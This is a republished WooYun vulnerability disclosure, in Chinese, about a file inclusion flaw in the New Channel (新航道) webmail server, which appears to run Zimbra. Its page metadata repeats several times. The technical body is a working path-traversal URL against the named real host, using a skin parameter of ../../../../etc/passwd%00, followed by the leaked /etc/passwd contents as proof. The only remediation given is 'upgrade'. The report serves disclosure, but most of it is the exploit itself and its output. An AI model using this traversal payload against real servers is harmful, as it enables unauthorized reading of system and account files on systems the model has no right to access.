新航道邮箱存在文件包含漏洞

admin

141928
文章

117
评论

2017年3月19日01:23:33评论343 views字数 199阅读0分39秒阅读模式

摘要

2016-03-16：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-04-30：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(1) 关注此漏洞

缺陷编号： WooYun-2016-185085

漏洞标题：新航道邮箱存在文件包含漏洞

漏洞作者：路人甲

提交时间： 2016-03-16 13:05

公开时间： 2016-04-30 13:05

漏洞类型：文件包含

危害等级：高

自评Rank： 13

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

2016-03-16：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-04-30：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

123

详细说明：

http://mail.newchannel.org/

http://mail.newchannel.org/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00

漏洞证明：

code 区域

a.root="x:0:0:root:/root:/bin/bash";
 a.bin="x:1:1:bin:/bin:/sbin/nologin";
 a.daemon="x:2:2:daemon:/sbin:/sbin/nologin";
 a.adm="x:3:4:adm:/var/adm:/sbin/nologin";
 a.lp="x:4:7:lp:/var/spool/lpd:/sbin/nologin";
 a.sync="x:5:0:sync:/sbin:/bin/sync";
 a.shutdown="x:6:0:shutdown:/sbin:/sbin/shutdown";
 a.halt="x:7:0:halt:/sbin:/sbin/halt";
 a.mail="x:8:12:mail:/var/spool/mail:/sbin/nologin";
 a.news="x:9:13:news:/etc/news:";
 a.uucp="x:10:14:uucp:/var/spool/uucp:/sbin/nologin";
 a.operator="x:11:0:operator:/root:/sbin/nologin";
 a.games="x:12:100:games:/usr/games:/sbin/nologin";
 a.gopher="x:13:30:gopher:/var/gopher:/sbin/nologin";
 a.ftp="x:14:50:FTP User:/var/ftp:/sbin/nologin";
 a.nobody="x:99:99:Nobody:/:/sbin/nologin";
 a.dbus="x:81:81:System message bus:/:/sbin/nologin";
 a.nscd="x:28:28:NSCD Daemon:/:/sbin/nologin";
 a.vcsa="x:69:69:virtual console memory owner:/dev:/sbin/nologin";
 a.pcap="x:77:77::/var/arpwatch:/sbin/nologin";
 a.ntp="x:38:38::/etc/ntp:/sbin/nologin";
 a.avahi="x:70:70:Avahi daemon:/:/sbin/nologin";
 a.rpc="x:32:32:Portmapper RPC user:/:/sbin/nologin";
 a.mailnull="x:47:47::/var/spool/mqueue:/sbin/nologin";
 a.smmsp="x:51:51::/var/spool/mqueue:/sbin/nologin";
 a.sshd="x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin";
 a.oprofile="x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin";
 a.haldaemon="x:68:68:HAL daemon:/:/sbin/nologin";
 a["avahi-autoipd"]="x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin";
 a.rpcuser="x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin";
 a.nfsnobody="x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin";
 a.xfs="x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin";
 a.gdm="x:42:42::/var/gdm:/sbin/nologin";
 a.ray="x:500:500::/home/ray:/bin/bash";
 a.named="x:25:25:Named:/var/named:/sbin/nologin";
 a.zimbra="x:1767:1767::/opt/zimbra:/bin/bash";
 a.postfix="x:502:502::/opt/zimbra/postfix:/bin/bash";

修复方案：

升级

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

新航道邮箱存在文件包含漏洞

漏洞概要关注数(1) 关注此漏洞

缺陷编号： WooYun-2016-185085

漏洞标题：新航道邮箱存在文件包含漏洞

相关厂商：新航道

漏洞作者：路人甲

提交时间： 2016-03-16 13:05

公开时间： 2016-04-30 13:05

漏洞类型：文件包含

危害等级：高

自评Rank： 13

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(共0人评价):

登陆后才能进行评分

评价

WooYun.org-优酷多个分站存在SSRF漏洞大礼包

WooYun.org-优特捷某内部邮箱账户外泄涉及大量敏感信息(多家合作单位躺枪)

WooYun.org-某网平行权限漏洞（影响所有使用用户）

Bypass分享 | 形而上学，不行退学的一句话

格兰仕千万数据库信息泄露

3399游戏源码下载

WEFANS喂饭后台弱口令

国家电网某充电APP系统Getshell涉及大量用户敏感信息

威锋网游戏站存在SQL注入（含多重绕过+编码）

APP安全之三维度从一个毫无用处的xss到获取大量身份证信息图片(包括李刚身份证)

发表评论

在线咨询

微信

漏洞概要 关注数(1) 关注此漏洞

缺陷编号： WooYun-2016-185085

漏洞标题： 新航道邮箱存在文件包含漏洞

相关厂商： 新航道

漏洞作者： 路人甲

提交时间： 2016-03-16 13:05

公开时间： 2016-04-30 13:05

漏洞类型： 文件包含

危害等级： 高

自评Rank： 13

漏洞状态： 未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(1) 关注此漏洞

漏洞标题：新航道邮箱存在文件包含漏洞

相关厂商：新航道

漏洞作者：路人甲

漏洞类型：文件包含

危害等级：高

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签：无

版权声明：转载请注明来源路人甲@乌云

漏洞评价(共0人评价):

登陆后才能进行评分